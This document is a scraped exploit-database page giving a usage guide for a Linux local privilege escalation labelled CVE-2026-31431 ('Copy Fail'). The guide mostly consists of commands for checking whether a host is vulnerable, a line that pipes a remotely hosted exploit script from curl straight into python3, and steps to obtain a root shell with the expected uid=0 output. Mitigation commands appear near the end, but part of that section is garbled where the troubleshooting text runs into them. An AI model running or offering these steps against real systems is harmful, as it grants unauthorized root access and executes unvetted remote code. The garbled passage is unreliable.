Share
## https://sploitus.com/exploit?id=6FF566A5-4991-5CA1-85EA-72C8451EEFDC
# Copy Fail (CVE-2026-31431) โ Exploit Usage Guide
## โ ๏ธ Disclaimer
This content is for educational and authorized security testing purposes only. Do **NOT** run this on systems without explicit permission.
---
## ๐ Overview
**Copy Fail (CVE-2026-31431)** is a **Linux Local Privilege Escalation (LPE)** vulnerability affecting the kernel crypto **API** via `AF_ALG`.
It allows an unprivileged user to overwrite page cache data of a SUID binary (e.g., `/usr/bin/su`) and gain **root access**.
---
## ๐ง Requirements
### System Requirements
- Linux kernel (vulnerable โ depends on patch status)
- `AF_ALG` enabled
- `algif_aead` module loaded
### Python Exploit Requirements
- Python **3.10+**
- Support for:
- `os.splice`
- `socket(AF_ALG)`
---
## ๐ Checking Vulnerability
```bash
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
```
Expected indicators:
- `authencesn(hmac(sha256),cbc(aes))`
- `algif_aead` loaded
---
## ๐ Running the Python Exploit
### 1. Execute directly
```bash
python3 copy_fail_exploit.py
```
### 2. Or via curl (if remote hosted)
```bash
curl https://copy.fail/exp | python3
```
### 3. Trigger root shell
```bash
su
id
```
Expected result:
```bash
uid=0(root)
```
---
## โ ๏ธ Common Issues (Python)
### โ Error: `os.splice not found`
Cause:
- Python version /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
```
### Apply kernel patch
Update your system:
```bash
apt update && apt upgrade
```
---
## ๐ Notes
- Exploit modifies **page cache only** (non-persistent)
- Requires local access
- Not remotely exploitable by default
---
## ๐ง Final Insight
If the exploit fails, consider:
- Kernel already patched
- Environment restrictions
- Alternate privilege escalation vectors (SUID, capabilities, sudo misconfig)
---
## ๐ References
- CVE-2026-31431
- https://copy.fail
---
## ๐จโ๐ป Author Notes
Use this exploit responsibly in labs, CTFs, and authorized pentests only.